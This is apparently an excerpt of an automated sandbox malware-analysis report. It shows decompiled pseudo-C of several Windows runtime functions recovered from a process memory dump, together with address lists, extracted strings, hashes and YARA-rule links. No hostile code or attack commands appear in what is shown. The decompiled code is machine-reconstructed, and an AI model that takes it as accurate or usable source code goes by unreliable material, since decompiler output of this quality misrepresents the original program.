																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1907b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1907b84 = _t75;
						_t73 = E0182EB70(_t134, 0x1907b60);
						if( *0x1907b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0182FF60( *0x1907b20);
							}
						}
						goto L5;
					}
				}
			}

0x0184fab0
0x0184fab2
0x0184fab3
0x0184fab4
0x0184fabc
0x0184fac0
0x0184fb14
0x0184fb17
0x0184fac2
0x0184fac8
0x0184facd
0x0184fad3
0x0184fad3
0x0184fadd
0x0184fb18
0x0184fb1b
0x0184fb1d
0x0184fb1e
0x0184fb1f
0x0184fb20
0x0184fb21
0x0184fb22
0x0184fb23
0x0184fb24
0x0184fb25
0x0184fb26
0x0184fb27
0x0184fb28
0x0184fb29
0x0184fb2a
0x0184fb2b
0x0184fb2c
0x0184fb2d
0x0184fb2e
0x0184fb2f
0x0184fb3a
0x0184fb3b
0x0184fb3e
0x0184fb41
0x0184fb44
0x0184fb47
0x0184fb4a
0x0184fb4d
0x0184fb53
0x0188bdcb
0x0188bdcb
0x0184fb59
0x0184fb5b
0x0184fb5b
0x0184fb5e
0x0188bdd5
0x0188bdd8
0x00000000
0x0188bdda
0x00000000
0x0188bdda
0x0184fb64
0x0184fb64
0x0184fb64
0x0184fb67
0x0184fb6e
0x0184fb70
0x0184fb72
0x00000000
0x0184fb78
0x0184fb7a
0x0184fb7a
0x0184fb7d
0x0184fb80
0x0188bddf
0x0188bde1
0x00000000
0x0188bde3
0x00000000
0x0188bde3
0x0184fb86
0x0184fb86
0x0184fb86
0x0184fb8b
0x0184fb90
0x0184fb92
0x0184fb94
0x0184fb9a
0x0184fb9b
0x0184fba1
0x0188bde8
0x0188bdeb
0x0188bded
0x0188beb5
0x0188beb5
0x0188bebb
0x0188bebd
0x0188bec3
0x0188bed2
0x0188bedd
0x0188bedd
0x0188beed
0x00000000
0x0188bdf3
0x0188bdfe
0x0188be06
0x0188be0b
0x0188be0d
0x0188be0f
0x0188be14
0x0188be19
0x0188be20
0x0188be25
0x0188be27
0x0188be35
0x0188be39
0x0188be46
0x0188be4f
0x0188be54
0x0188be56
0x0188bef8
0x0188bef8
0x00000000
0x0188be5c
0x0188be5c
0x0188be60
0x00000000
0x0188be66
0x0188be66
0x0188be7f
0x0188be84
0x0188be87
0x0188be89
0x0188be8b
0x0188be99
0x0188be9d
0x0188bea0
0x0188beac
0x0188beaf
0x0188beb1
0x0188beb3
0x0188beb3
0x00000000
0x0188bea2
0x0188bea2
0x00000000
0x0188bea2
0x0188be8d
0x0188be8d
0x0188be92
0x00000000
0x0188be92
0x0188be8b
0x0188be60
0x0188be3b
0x0188be3b
0x0188be3e
0x00000000
0x0188be40
0x0188be40
0x0188be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0188be44
0x0188be3e
0x0188be29
0x0188be29
0x00000000
0x0188be29
0x0188be27
0x00000000
0x0184fba7
0x0184fba7
0x0184fbab
0x0188bf02
0x0184fbb1
0x0184fbb1
0x0184fbb8
0x0184fbbd
0x0184fbbd
0x0184fbbf
0x0184fbbf
0x0184fbc5
0x0184fbcb
0x0184fbf8
0x0184fbf8
0x0184fbfa
0x00000000
0x0184fc00
0x0184fc00
0x0184fc03
0x00000000
0x0184fc09
0x0184fc09
0x0184fc0f
0x0184fc15
0x0184fc23
0x0184fc23
0x0184fc25
0x0184fc27
0x0184fc75
0x0184fc7c
0x0184fc84
0x00000000
0x0184fc29
0x0184fc29
0x0184fc2d
0x0184fc30
0x0188bf0f
0x00000000
0x0184fc36
0x0184fc38
0x0184fc3b
0x0184fc41
0x0188bf17
0x0188bf19
0x0188bf48
0x0188bf4b
0x00000000
0x0188bf1b
0x0188bf22
0x0188bf24
0x0188bf26
0x00000000
0x0188bf2c
0x0188bf37
0x0188bf39
0x0188bf3b
0x00000000
0x0188bf41
0x0188bf41
0x0188bf41
0x0188bf41
0x0188bf45
0x00000000
0x0188bf45
0x0188bf3b
0x0188bf26
0x00000000
0x0184fc47
0x0184fc47
0x0184fc49
0x0184fcb2
0x0184fcb4
0x0184fcb6
0x0184fcdc
0x0184fcdc
0x00000000
0x0184fcb8
0x0184fcc3
0x0184fcc5
0x0184fcc7
0x00000000
0x0184fcc9
0x0184fcc9
0x0184fccd
0x00000000
0x0184fccd
0x0184fcc7
0x00000000
0x0184fc4b
0x0184fc4b
0x0184fc4e
0x0184fc4e
0x0184fc51
0x0184fc51
0x0184fc54
0x0184fc5a
0x0184fc5c
0x0184fc5f
0x0184fc61
0x0184fc63
0x0184fc65
0x0184fc67
0x0184fc6e
0x0184fc72
0x0184fc72
0x0184fc72
0x0184fc72
0x0184fc67
0x0184fc61
0x00000000
0x0184fc5a
0x0184fc49
0x0184fc41
0x0184fc30
0x0184fc27
0x0184fc03
0x0184fbcd
0x0184fbd3
0x0184fbd9
0x0184fbdc
0x0184fbde
0x0184fc99
0x0184fc9b
0x0184fc9d
0x0184fcd5
0x0184fcd5
0x0184fc89
0x0184fc89
0x00000000
0x0184fc9f
0x0184fc9f
0x0184fca3
0x00000000
0x0184fca3
0x00000000
0x0184fbe4
0x0184fbe4
0x0184fbe4
0x0184fbe4
0x0184fbe9
0x0184fbf2
0x00000000
0x0184fbf2
0x0184fbde
0x0184fbcb
0x0184fbab
0x0184fc8b
0x0184fc8b
0x0184fc8c
0x0184fb80
0x0184fb72
0x0184fb5e
0x0184fc8d
0x0184fc91
0x0184fadf
0x0184fadf
0x0184fae1
0x0184fae4
0x0184fae7
0x0184faec
0x0184faf8
0x0184fb00
0x0184fb07
0x0184fb0f
0x0184fb0f
0x0184fb07
0x00000000
0x0184faf8
0x0184fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0188BE0F

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: d0a8de036e23a4908f1d74a903044263777bb76126e91db7f45ddeeb0e5d6723
Instruction ID: a27e1a9961f7246be9bcef3d849174f4beeefb3a90ec71b433800a5c220c7ecc
Opcode Fuzzy Hash: d0a8de036e23a4908f1d74a903044263777bb76126e91db7f45ddeeb0e5d6723
Instruction Fuzzy Hash: F1A11431B00A1A8FEB26DF6CC450B7AB7A4AF48724F04456DEA46DB681DF34DB41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01812D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01812D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1905350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1907bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018597C0();
				}
				if( *0x19079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01841624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01837D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E018AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01859520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0184E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0186DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1906901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1906901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01859980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01837D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01837D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01897016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E018AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1905350;
							if(_t109 != 0x1905350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E018AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E018A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01812d8a
0x01812d8a
0x01812d92
0x01812d96
0x01812d9e
0x01812da0
0x01812da3
0x01812da5
0x01812da8
0x01812dab
0x01812db2
0x0186f9aa
0x0186f9ab
0x0186f9ae
0x0186f9ae
0x01812db8
0x01812dc2
0x0186f9b9
0x0186f9be
0x0186f9bf
0x0186f9bf
0x01812dcf
0x0186f9c9
0x01812dd5
0x01812dd5
0x01812dd5
0x01812dde
0x01812de1
0x01812e70
0x01812e72
0x01812e72
0x01812de7
0x01812deb
0x01812e7c
0x01812e83
0x01812e85
0x01812e8b
0x01812e8d
0x01812e92
0x01812e92
0x01812e85
0x01812df1
0x01812df7
0x01812df9
0x01812df9
0x01812dfc
0x01812dff
0x01812e02
0x00000000
0x01812e05
0x01812e0c
0x0186f9d9
0x01812e12
0x01812e12
0x01812e12
0x01812e1a
0x0186f9e3
0x0186f9e9
0x0186f9f0
0x0186f9f6
0x0186f9f8
0x0186f9f8
0x0186f9f0
0x01812e23
0x0186fa02
0x0186fa03
0x0186fa05
0x0186fa06
0x00000000
0x01812e29
0x01812e29
0x01812e2e
0x01812e34
0x01812e3e
0x00000000
0x00000000
0x01812e44
0x01812e47
0x01812e4d
0x00000000
0x00000000
0x01812e4f
0x01812e54
0x00000000
0x00000000
0x01812e5a
0x01812e5f
0x01812e9a
0x01812ea4
0x01812ea5
0x01812ea8
0x01812eaf
0x01812eb2
0x01812eb5
0x0186fae9
0x0186faeb
0x0186faed
0x0186faef
0x0186faf7
0x0186faf8
0x0186fafd
0x0186faff
0x0186fb04
0x0186fb04
0x0186faff
0x01812ec0
0x01812ec4
0x01812ec6
0x01812ec8
0x0186fb14
0x0186fb18
0x0186fb1e
0x0186fb21
0x0186fb21
0x01812ece
0x01812ece
0x01812ece
0x01812ed7
0x01812e61
0x01812e63
0x0186fa6b
0x0186fa71
0x0186fa76
0x0186fa78
0x0186fa8a
0x0186fa7a
0x0186fa83
0x0186fa83
0x0186fa8f
0x0186fa91
0x0186fa97
0x0186fa9d
0x0186faa4
0x0186faaa
0x0186faaf
0x0186fab1
0x0186fac3
0x0186fab3
0x0186fabc
0x0186fabc
0x0186fac8
0x0186facb
0x0186fadf
0x0186fadf
0x0186facb
0x0186faa4
0x0186fa91
0x01812e6f
0x01812e6f
0x01812e5f
0x0186fa13
0x0186fa15
0x0186fa17
0x0186fa1f
0x0186fa21
0x0186fa22
0x0186fa25
0x0186fa28
0x0186fa2f
0x0186fa2f
0x0186fa2a
0x0186fa2a
0x0186fa2a
0x0186fa31
0x0186fa34
0x0186fa36
0x0186fa3c
0x0186fa3e
0x0186fa41
0x0186fa43
0x0186fa45
0x0186fa45
0x0186fa41
0x0186fa3c
0x0186fa4a
0x0186fa4f
0x0186fa51
0x0186fa53
0x0186fa56
0x0186fa5b
0x0186fa5e
0x00000000
0x0186fa5e
0x01812e23

Strings

RTL: Re-Waiting, xrefs: 0186FA4A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 4191f2f8e147d64f50d962cf90dca085ef7b5bce459fc41cc16443085231dba6
Instruction ID: c32f0693d1579d52787db5cecf9bd99b44ca21873bb6f85ab31c3a5be84697ab
Opcode Fuzzy Hash: 4191f2f8e147d64f50d962cf90dca085ef7b5bce459fc41cc16443085231dba6
Instruction Fuzzy Hash: 59613A72A006499FEB32DF6CD854B7E7BAAEB44718F240269D651D72C5C734DB01C781

Uniqueness

Uniqueness Score: -1.00%

Function 018E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E018DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E018E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01859730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E018DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E018DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1908b04 >> 0x14) + (_v44 -  *0x1908b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01837D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E018D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01837D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E018CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1908724 & 0x00000008) != 0) {
						E018D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018E15B5(0x1908ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x018e0eb7
0x018e0eb9
0x018e0ec0
0x018e0ec2
0x018e0ecd
0x018e105b
0x018e105b
0x018e1061
0x018e1066
0x018e1066
0x018e106b
0x018e1073
0x018e1073
0x018e0ed3
0x018e0ed6
0x018e0edc
0x018e0ee0
0x018e0ee7
0x018e0ef0
0x018e0ef5
0x018e0efa
0x018e0efc
0x018e0efd
0x018e0f03
0x018e0f04
0x018e0f06
0x018e0f07
0x018e0f09
0x018e0f0e
0x018e0f14
0x018e0f23
0x018e0f2d
0x018e0f34
0x018e0f34
0x018e0f14
0x018e0f52
0x00000000
0x00000000
0x018e0f58
0x018e0f73
0x018e0f74
0x018e0f79
0x018e0f7d
0x018e0f80
0x018e0f86
0x018e0fab
0x018e0fb5
0x018e0fc6
0x018e0fd1
0x018e0fe3
0x018e0fd3
0x018e0fdc
0x018e0fdc
0x018e0feb
0x018e1009
0x018e1009
0x018e1015
0x018e1027
0x018e1017
0x018e1020
0x018e1020
0x018e102f
0x018e103c
0x018e103c
0x018e1048
0x018e1050
0x018e1050
0x018e1055
0x00000000
0x018e1055
0x018e0f88
0x018e0f9e
0x018e0fa2
0x018e0fa9
0x00000000
0x00000000
0x00000000
0x018e0fa9
0x00000000

Strings

`, xrefs: 018E0F16

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 919c67205528ddadfb74465e4dc7e5e1459c290d4d74a363c4119c55e37fa293
Instruction ID: 92a54b3ca8b4333973c4ea33336d345f328d959a5a0fc7a6fa701d2dd86f6c76
Opcode Fuzzy Hash: 919c67205528ddadfb74465e4dc7e5e1459c290d4d74a363c4119c55e37fa293
Instruction Fuzzy Hash: 0A519E713043829FE325DF28D888B1BBBE5EBC5714F04092DFA96D7291D671EA05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0184F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0184F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01834120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01859830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01859990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018595D0();
							goto L11;
						} else {
							_t109 = L01834620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0185F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018595D0();
										L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0184f0d3
0x0184f0d9
0x0184f0e0
0x0184f0e7
0x0184f0f2
0x0184f0f4
0x0184f0f8
0x0184f100
0x0184f108
0x0184f10d
0x0184f115
0x0184f116
0x0184f11f
0x0184f123
0x0184f124
0x0184f12c
0x0184f130
0x0184f134
0x0184f13d
0x0184f144
0x0184f14b
0x0184f152
0x0188bab0
0x0188bab0
0x0184f158
0x0184f158
0x0184f15a
0x0184f160
0x0184f165
0x0184f166
0x0184f16f
0x0184f173
0x0188baa7
0x0188baa7
0x0188baab
0x00000000
0x0184f179
0x0184f18d
0x0184f191
0x0188baa2
0x00000000
0x0184f197
0x0184f19b
0x0184f1a2
0x0184f1a9
0x0184f1af
0x0184f1b2
0x0184f1b6
0x0184f1b9
0x0184f1c4
0x0184f1d8
0x0184f1df
0x0184f1e3
0x0184f1eb
0x0184f1ee
0x0184f1f4
0x0184f20f
0x0188bab7
0x0188babb
0x0188bacc
0x0188bad1
0x0184f215
0x0184f218
0x0184f226
0x0184f22b
0x00000000
0x0184f22b
0x0184f1f6
0x0184f1f6
0x0184f1f9
0x0184f1fb
0x0184f1fb
0x0184f1f4
0x0184f191
0x0184f173
0x0184f152
0x0184f203

Strings

@, xrefs: 0184F124

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 40acc75103accfcffcf4632f2760af2865dc3366b8b9d237532509b7c1375657
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: A9516A715047159BC321DF19C840A6BBBF8FF88714F00892DFA95D7690E7B4EA14CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01893540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01893540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x190d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01850BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01893706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0185FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01893540;
						E0185FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0186DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E018A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018597C0();
					}
					return E0185B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01893971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01893884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0185FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01859650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01893787(_a4,  &_v352, _t80);
						}
					}
					L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01893552
0x0189355a
0x0189355d
0x01893566
0x01893567
0x0189357e
0x0189358f
0x018935a1
0x018935a5
0x0189366b
0x0189366b
0x0189366d
0x01893672
0x01893679
0x01893685
0x0189368d
0x0189369d
0x018936a7
0x018936b8
0x018936c6
0x018936c7
0x018936dc
0x018936e1
0x018936e7
0x018936e9
0x018936e9
0x01893703
0x01893703
0x018935b5
0x018935c0
0x018935c4
0x00000000
0x00000000
0x018935ca
0x018935d7
0x018935e2
0x018935e6
0x018935e8
0x018935f5
0x018935fa
0x01893603
0x01893604
0x01893609
0x0189360a
0x01893612
0x01893613
0x0189361e
0x01893622
0x01893628
0x0189362f
0x0189362f
0x01893636
0x01893638
0x0189363b
0x01893642
0x01893642
0x01893636
0x01893657
0x01893657
0x0189365c
0x01893662
0x01893669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0189358F

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
